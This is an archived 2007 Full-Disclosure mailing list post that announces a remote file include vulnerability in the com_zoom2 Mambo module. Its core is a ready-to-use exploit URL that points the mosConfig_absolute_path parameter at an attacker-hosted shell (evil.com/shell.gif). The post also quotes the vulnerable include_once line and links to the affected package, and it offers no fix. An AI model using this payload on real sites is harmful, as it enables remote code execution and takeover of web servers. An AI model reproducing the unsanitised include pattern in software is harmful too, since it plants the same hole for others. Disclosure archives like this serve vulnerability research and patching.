[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability

To: submit@xxxxxxxxxxx, bugtraq@xxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@xxxxxxxxx>
Date: Wed, 11 Apr 2007 04:24:47 +0200

com_zoom2 Mambo Module Remote File Include Vulnerability

##################

autor:0o_zeus_o0
website:www.diosdelared.com
mail:zeus@xxxxxxxxxxxxxxx
10/04/07

##################################

/components/com_zoom2/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http:/evil.com/shell.gif?

include_once("$mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php");

site download :
http://mamboxchange.com/frs/download.php/3740/com_zoom_25_Beta.zip

###################################################

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Hackers uniting against Iran?
Next by Date: [Full-disclosure] Application Layer Anti-virus/Firewall
Previous by thread: [Full-disclosure] [ MDKSA-2007:075-1 ] - Updated qt4 packages to address utf8 decoder bug
Next by thread: [Full-disclosure] Application Layer Anti-virus/Firewall
Index(es):
- Date
- Thread